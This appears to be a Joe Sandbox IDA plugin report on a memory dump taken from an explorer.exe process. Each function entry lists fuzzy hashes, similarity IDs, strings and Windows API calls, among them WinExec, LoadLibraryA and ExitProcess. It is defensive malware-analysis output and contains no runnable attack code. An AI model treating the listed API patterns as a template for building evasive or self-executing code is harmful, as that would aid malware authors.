Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 7cbdb4c54c80e264799a4e2e3466e5e2f6ae208b956485761e4c659eb70c98eb
Instruction ID: 87f888c7f04284289a81fece357fb79311e6df475ee013cae511868d76d5967a
Opcode Fuzzy Hash: 7cbdb4c54c80e264799a4e2e3466e5e2f6ae208b956485761e4c659eb70c98eb
Instruction Fuzzy Hash: E2E146B05083459FE764CF15C884B6ABBE1FF8A314F148A2DF59983A50D370EA95CF92

Uniqueness

Uniqueness Score: -1.00%

Function 008E2D3A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008E2C95,?,?,00000008,?,?,008E2870,00000000), ref: 008E2F67

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3b26ad612b755c133259baba2604d3492c6980c31972fd1588d5071a61d4ad85
Instruction ID: 048907171b9596ac0e856f4c054f5f1f09bbae56d3d4dbc590937cca8002ecf1
Opcode Fuzzy Hash: 3b26ad612b755c133259baba2604d3492c6980c31972fd1588d5071a61d4ad85
Instruction Fuzzy Hash: A6B15C31610649CFD729CF29C48AB657BE0FF46364F258658E89ACF2A2C735ED91CB40

Uniqueness

Uniqueness Score: -1.00%

Function 008A2D83 Relevance: 1.7, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

a, xrefs: 008A2DE4

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: 1bfc0c6bc630824adebd5b529398c32cca4102bd2fba9ee5342244522b16bb83
Instruction ID: e6998d71ac1b40e871d5e2c6e639672b61d21681049a4acb62e3cea623f52d9f
Opcode Fuzzy Hash: 1bfc0c6bc630824adebd5b529398c32cca4102bd2fba9ee5342244522b16bb83
Instruction Fuzzy Hash: E21201706083459FE724CF19C884B2BBBE2FF89308F14892DF58987651D775EA48DB92

Uniqueness

Uniqueness Score: -1.00%

Function 008D807F Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008D81CE
FindNextFileW.KERNEL32(00000000,?), ref: 008D8249
FindClose.KERNEL32(00000000), ref: 008D826B

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f0a774ac1aa589f8c7652180fb812ff9238c4529d497949f7748501dabd29bae
Instruction ID: 379503331b4a89e644796ace4650bc2f2869a8528b94293cdb4bab9a944c0d61
Opcode Fuzzy Hash: f0a774ac1aa589f8c7652180fb812ff9238c4529d497949f7748501dabd29bae
Instruction Fuzzy Hash: 8F411472600609EFDB20AFADDC859BFB3A9FF84354F14426AF905D7341EE30AD098660

Uniqueness

Uniqueness Score: -1.00%

Function 008C1578 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008C158E

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 509aa1737bbfd59b94a5e21f270ecb55e8c19c3bd4c218a918543763f80fe166
Instruction ID: b65ae37163313c6be207236fd574f23eb1d9da18297259165263f6809f3bf2df
Opcode Fuzzy Hash: 509aa1737bbfd59b94a5e21f270ecb55e8c19c3bd4c218a918543763f80fe166
Instruction Fuzzy Hash: 385169B1A01659CFEB15CF94D8C9BAABBF0FB49320F24806AC501EB252E774E940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 008A274C Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

a, xrefs: 008A27F5

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: 2f32e0eee5bd00c328ef028d7a1ce15141ec3223673ac9d9c098b1f010f69a43
Instruction ID: c9e2cf3db68c1a2af0fb5920480fa7fa68e518c97b3922cf2f77c4bca13a557e
Opcode Fuzzy Hash: 2f32e0eee5bd00c328ef028d7a1ce15141ec3223673ac9d9c098b1f010f69a43
Instruction Fuzzy Hash: 5CE101706083459FE724CF19C884B6BBBE1FF89318F14892DE98AC7A50D774E949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 008C51D4 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 008C5362

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c5d32cedd4ca215adc6879735b0f81a6ca941c281705a26b7a26ab23d7b162a5
Instruction ID: 71bb30adc129bce0260369d0453424cfd3a53889a86fec7b6bcc1fe7d82ae915
Opcode Fuzzy Hash: c5d32cedd4ca215adc6879735b0f81a6ca941c281705a26b7a26ab23d7b162a5
Instruction Fuzzy Hash: 76C16970900A4A8FCF288E68C491F6EBBF2FB16314B24461DE496DB291C770F9C5CB55

Uniqueness

Uniqueness Score: -1.00%

Function 008AED3B Relevance: .9, Instructions: 939COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0e41b0a7da178c60eb3bc2783c6ecc3a2d39fc07fbc3406b6db05d12684b2d
Instruction ID: 91d50b7b90b446745d7c4393dfb6686ddd64f7467a4a45b8a300c0ff2c0c14b4
Opcode Fuzzy Hash: 4a0e41b0a7da178c60eb3bc2783c6ecc3a2d39fc07fbc3406b6db05d12684b2d
Instruction Fuzzy Hash: D6828074D0024D8BEF28CB98C9816BDBBB1FB16704F24493AE216EBB51D778D9418B53

Uniqueness

Uniqueness Score: -1.00%

Function 008A05D8 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fc3a9db4aa67236db6233463ef54b47030403b44653fdebf6ffb061f59cdbf
Instruction ID: f7d425b549a5e784c22586e7731ba84a846c3fc2fcb93151157bccee96a4b0e1
Opcode Fuzzy Hash: 49fc3a9db4aa67236db6233463ef54b47030403b44653fdebf6ffb061f59cdbf
Instruction Fuzzy Hash: 426268316087458FD725DF28C080A6AB7E1FF99314F188A6DE4CA9B752D735E846CF42

Uniqueness

Uniqueness Score: -1.00%

Function 008BED17 Relevance: .6, Instructions: 565COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca6fc406585396305f7d2088fc1ada4ae21cff135d5dff3f52135aa990fa196
Instruction ID: 1fd20f598d986d825add95ef824966092ea81bb16fbdd391188be013472f9dfe
Opcode Fuzzy Hash: 2ca6fc406585396305f7d2088fc1ada4ae21cff135d5dff3f52135aa990fa196
Instruction Fuzzy Hash: 78228CB1508355CFCA24AF1CC8855EEBBE1FBA5314F24882EE585C7362D734D981AB83

Uniqueness

Uniqueness Score: -1.00%

Function 008ABD53 Relevance: .5, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40be53b065b00c4d8c811c47cd04c72b2214bbce686af618a0ab63abe970791a
Instruction ID: 3d8fc9e96b84fcfe05abd8d4d895fd7dcf32ace306b09d085290ac4504108c14
Opcode Fuzzy Hash: 40be53b065b00c4d8c811c47cd04c72b2214bbce686af618a0ab63abe970791a
Instruction Fuzzy Hash: 70129F706087448FD324DF28C88166ABBE2FF96314F548A2DE5D6C7B82E735E845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0089FF6C Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a80f90b7c4ee3edd4112f382edf50f88ab92875c20c64800365d68421f9e3b0e
Instruction ID: 7b4f0fe2bc16dccd6a9dc12ad036d6e0e9eba1b321c5716cf7dafcc78e9467d6
Opcode Fuzzy Hash: a80f90b7c4ee3edd4112f382edf50f88ab92875c20c64800365d68421f9e3b0e
Instruction Fuzzy Hash: 6E125371A087059FD714DF29C48066AFBE1FF89314F148A2EE899C7752EB74E8458F82

Uniqueness

Uniqueness Score: -1.00%

Function 008A108C Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b2ba63fc3c5cc6eb9be6e3903b5664822034862deb9e82cfc3d45cb791d290
Instruction ID: f11c7f4fba9696bdcb4f270c54caa4c02510429b768c9d9ea1adae23a4866051
Opcode Fuzzy Hash: 81b2ba63fc3c5cc6eb9be6e3903b5664822034862deb9e82cfc3d45cb791d290
Instruction Fuzzy Hash: BA020F70510B548FDB28CE29C59862ABBF2FF46710B944A2DD6A78BE90D735F844CB18

Uniqueness

Uniqueness Score: -1.00%

Function 008C84B3 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc98e6877ca80c5c97a2532ef62b1e245aace4fafe747c02335a7366bfc97609
Instruction ID: 26bb44ad0ae6357a941b3274d33eeefb51257fd85948841bcdd5b3fb1036b984
Opcode Fuzzy Hash: bc98e6877ca80c5c97a2532ef62b1e245aace4fafe747c02335a7366bfc97609
Instruction Fuzzy Hash: A2E1A870A80609CFCB24CF68C484FAAB7B1FF49314B648A6DD456DB691EB70ED42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008C5E94 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944e6d26744cf357ffa7d41144c5b8fac39fd1be6bbd3fa2cf353e0e6a1b3533
Instruction ID: 3c545f4b4c62828e946f9ec7b3be1c6ca54b08659a55947d649eda9c13196925
Opcode Fuzzy Hash: 944e6d26744cf357ffa7d41144c5b8fac39fd1be6bbd3fa2cf353e0e6a1b3533
Instruction Fuzzy Hash: B7E19D70600A098FCB28CF68C580F6AB7F1FF45314B24866DE456EB691EB31ED96CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008ACBED Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
Instruction ID: fde4d4d8c2306ee619269a22f50b7b7aca57662aa43fedb6730056e470905788
Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
Instruction Fuzzy Hash: B8E10D76A0830A8FD714CF18C4C066AB7E2FB8A710F59892DE995CB781D735EC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 008C78EF Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ecdab966b19696b391fd58cb39aa89751dc8c211397caeaf05cf6561b47c73b
Instruction ID: 2c6c6702c6eb34c799dc758df8667cba2ad9373f8d2b7fa5d8db0990d351db8e
Opcode Fuzzy Hash: 0ecdab966b19696b391fd58cb39aa89751dc8c211397caeaf05cf6561b47c73b
Instruction Fuzzy Hash: CFC19970A0865A8FCB28CE68C491F6EBBB1FB05324F24461DD496DB291C735ED49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 008A6393 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77749ee1fbbd0748a5cd56f7bbc26c161fdc5cd406cb9f68b9d7281bcefcd1ad
Instruction ID: 968d7270bbece825249889bbb72ffb6fb4c72c3301740f906ddc19aede8f84ff
Opcode Fuzzy Hash: 77749ee1fbbd0748a5cd56f7bbc26c161fdc5cd406cb9f68b9d7281bcefcd1ad
Instruction Fuzzy Hash: 08C18E70509346AFD714CF28C84469ABFA1FF69304F08865DF8999B782D730DA28CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 008CFA1B Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffcfdbef7916ecff17260b097f2326a2b232f334d7e4dee7579234e9330aee5
Instruction ID: 7c2af3369fa62c939ebb278010cb6c356f80469f142529f11d678193db0322f8
Opcode Fuzzy Hash: dffcfdbef7916ecff17260b097f2326a2b232f334d7e4dee7579234e9330aee5
Instruction Fuzzy Hash: 0F514171E00119AFDF14CF99C991BAEBBB6FF88314F19806DE515AB242C7349E50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008C1C70 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: afaf5e3ee09203b17087780b064d86e0621b526d7b7be07c1a2d6f9b24c47331
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 7711BE7728019243DE148A6D98FCFBAA3B5FBD732172D426EE142CB75AD232E9459600

Uniqueness

Uniqueness Score: -1.00%

Function 0089DB70 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae2cc424bf573f47800d078eede107c22a08c316a2e6c8d7f418b1aa08ecee4
Instruction ID: 0c4f8a30d196643ef3ab95e992d1f3267e7184b849d7c952c77d545131652ae4
Opcode Fuzzy Hash: cae2cc424bf573f47800d078eede107c22a08c316a2e6c8d7f418b1aa08ecee4
Instruction Fuzzy Hash: 5B11A977A182F507D711CFB69CD012AF792FB8B72270F4365DD85EB251C220AC1086E4

Uniqueness

Uniqueness Score: -1.00%

Function 008D5E85 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction ID: 13a2820098f02f59b4e87ac6fa0689ff8307bb858df117462dda7a102b934fb8
Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction Fuzzy Hash: D4E04632911228EBCB15EB9C890498AB3ACFB49B11B110197B501D3200C270DF00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 008CADBA Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd915462852245cca9bb77eb0d9cd278e135c9e906a0c69b8f8a86becc92351
Instruction ID: 592a23eb5861df46c2b02dbbc1701403f5651cd30e5a52aad4204237fd077f49
Opcode Fuzzy Hash: efd915462852245cca9bb77eb0d9cd278e135c9e906a0c69b8f8a86becc92351
Instruction Fuzzy Hash: CFC08C384009088ACE2D99949271BA43774F3D1787F80048FC6038BF42CA2FDC86F622

Uniqueness

Uniqueness Score: -1.00%

Function 00897B9D Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 465libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdl), ref: 00898311
ExitProcess.KERNEL32 ref: 00898352

Strings

ntdl, xrefs: 0089830D, 00898310
Warning, xrefs: 00897D88
l, xrefs: 008982F9
l.dl, xrefs: 008982FF

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ExitLibraryLoadProcess
String ID: Warning$l$l.dl$ntdl
API String ID: 2206315515-3352965749
Opcode ID: 3613ce8fd6365fddfb472eea749558bb8007319221eb3511cd6cd145f1ccc154
Instruction ID: 22e15061e02a2655b62e0b027485590d41d8b816c2e1aab04958540da1d65ba6
Opcode Fuzzy Hash: 3613ce8fd6365fddfb472eea749558bb8007319221eb3511cd6cd145f1ccc154
Instruction Fuzzy Hash: 2902A271D1421ACB8F24AFACC8845ADBBB0FF49314F684666E915FB350DB748D408B97

Uniqueness

Uniqueness Score: -1.00%

Function 008DF6BF Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 008DF7DE
CatchIt.LIBVCRUNTIME ref: 008DF93D
_UnwindNestedFrames.LIBCMT ref: 008DFA3E
CallUnexpected.LIBVCRUNTIME ref: 008DFA59

Strings

csm, xrefs: 008DF6FC
csm, xrefs: 008DF769
csm, xrefs: 008DF815

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2332921423-393685449
Opcode ID: 1f106178b614d6a0cf22ee881d0b1307683b99bd44ad240fdac2f9e2c594b201
Instruction ID: 14d2a56ce02457a9e7a49ce17c3faf174886295b082585420fd82c42e264ba34
Opcode Fuzzy Hash: 1f106178b614d6a0cf22ee881d0b1307683b99bd44ad240fdac2f9e2c594b201
Instruction Fuzzy Hash: 51B17E71C00219EFCF24DF98C881A9EBBB5FF14314B14426BE916AB312D771DA51EB92

Uniqueness

Uniqueness Score: -1.00%

Function 008B8280 Relevance: 10.6, APIs: 7, Instructions: 99processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 008B82E0
GetCurrentProcessId.KERNEL32 ref: 008B82E6
GetFileSizeEx.KERNEL32(?), ref: 008B8342
GetModuleHandleW.KERNEL32(00000000), ref: 008B8362
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 008B836F
WinExec.KERNEL32(?,00000000), ref: 008B83CF
ExitProcess.KERNEL32 ref: 008B83D6

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FileHandleModuleProcess$CloseCurrentExecExitNameSize
String ID:
API String ID: 515874469-0
Opcode ID: 448ee22351c78928958040d6c6f1c577307b8dd273b58825418d84c5d2151dea
Instruction ID: 445aed71f55673dbfbe60615886ac74fc74dcc0a28c80c37db51786231602ab1
Opcode Fuzzy Hash: 448ee22351c78928958040d6c6f1c577307b8dd273b58825418d84c5d2151dea
Instruction Fuzzy Hash: E831B275A08740EBC6209F69CC84AAF7AB8FF89720F104A1AF595C7350CB34D856CB63

Uniqueness

Uniqueness Score: -1.00%

Function 008D8B1E Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea070f61bda175a61e7075ecf58e85dec5ea7faa299c1d5795bd9c670c2c0262
Instruction ID: 58a98bd71765337cece8f1d29ce9e958d3780b015e23e4ce8c982090584b61c6
Opcode Fuzzy Hash: ea070f61bda175a61e7075ecf58e85dec5ea7faa299c1d5795bd9c670c2c0262
Instruction Fuzzy Hash: F5B17970A04249EFDB11DBA9C881BADBBB2FF59314F14425AE401EB392DBB19D41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 008D2B44 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008D2B3B,008C1966,008C14B7), ref: 008D2B52
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008D2B60
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008D2B79
SetLastError.KERNEL32(00000000,008D2B3B,008C1966,008C14B7), ref: 008D2BCB

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 07828f45dd96bf31584a68d9eff03260a3eddd92d1517342cb4d146b9f11aef8
Instruction ID: 464fae0a5370254a3295298b67f2b364ed70c1813a7fcd8d1a1de2c96839fb40
Opcode Fuzzy Hash: 07828f45dd96bf31584a68d9eff03260a3eddd92d1517342cb4d146b9f11aef8
Instruction Fuzzy Hash: 4A01D832209217EE96253E78ADC6A273F55FB61374720033BFA14C92F2EE914C029251

Uniqueness

Uniqueness Score: -1.00%

Function 008A9455 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,D95F0960,D95F0960,00000000,00000000), ref: 008A95A0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 008A96DB

Strings

@iN, xrefs: 008A9623
@iN, xrefs: 008A968B
@iN, xrefs: 008A952C

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: @iN$@iN$@iN
API String ID: 626452242-3936761298
Opcode ID: e1dc083a2a8afc70d86aed1dc96bf1fa9fac13268be38d470696d5295f169777
Instruction ID: bc5c3bda0787b85064a490c281fa84ecd76848a208e9bd4333ebbec86b7349ed
Opcode Fuzzy Hash: e1dc083a2a8afc70d86aed1dc96bf1fa9fac13268be38d470696d5295f169777
Instruction Fuzzy Hash: 57513B3160E2455BFB389D2C9C4953EB9A4FBDB314F258A2AF1C5CAAA1E620CC40C757

Uniqueness

Uniqueness Score: -1.00%

Function 008CDB07 Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(008CDAA2,?,00000000,?), ref: 008CDB29
GetFileInformationByHandle.KERNEL32(008CDAA2,?), ref: 008CDB83
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,008CDAA2,?,000000FF,00000000), ref: 008CDC11
__dosmaperr.LIBCMT ref: 008CDC18
PeekNamedPipe.KERNEL32(008CDAA2,00000000,00000000,00000000,?,00000000), ref: 008CDC55

Part of subcall function 008CD844: __dosmaperr.LIBCMT ref: 008CD879

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: e075eb48b153d2c375fc55ee12daa1720f5a7c73df8d041aa31b5764e9012c37
Instruction ID: 1f9d69ad32c701ed97d60d8d79cba498df1d3dc6d23451733fc1e14b2f78e89d
Opcode Fuzzy Hash: e075eb48b153d2c375fc55ee12daa1720f5a7c73df8d041aa31b5764e9012c37
Instruction Fuzzy Hash: 9A412A75900744ABDB24EFA9D885EABBBF9FF88300B00852EF856D3611E730E841CB11

Uniqueness

Uniqueness Score: -1.00%

Function 008BC1EC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008BC4D0

Strings

[&T!, xrefs: 008BC2C8
\&T!, xrefs: 008BC4B1
\&T!, xrefs: 008BC2D3

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID: [&T!$\&T!$\&T!
API String ID: 4218353326-1060882007
Opcode ID: a5b83fd0c896d967ea752b9570a760f06492e5dc9dfc2744106127dc97ce9421
Instruction ID: f12daa5a9fb5478d15c835d482dfa67ecd219160cb251ee6a53208a1ed48ab16
Opcode Fuzzy Hash: a5b83fd0c896d967ea752b9570a760f06492e5dc9dfc2744106127dc97ce9421
Instruction Fuzzy Hash: CB8168B1D0021E8FCF248FE889815FEBAB4FB19304F644A57E425F6360D3759A408BA6

Uniqueness

Uniqueness Score: -1.00%

Function 008DFAE4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 008DFB09
CatchIt.LIBVCRUNTIME ref: 008DFBEF

Strings

MOC, xrefs: 008DFB1B
RCC, xrefs: 008DFB23

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

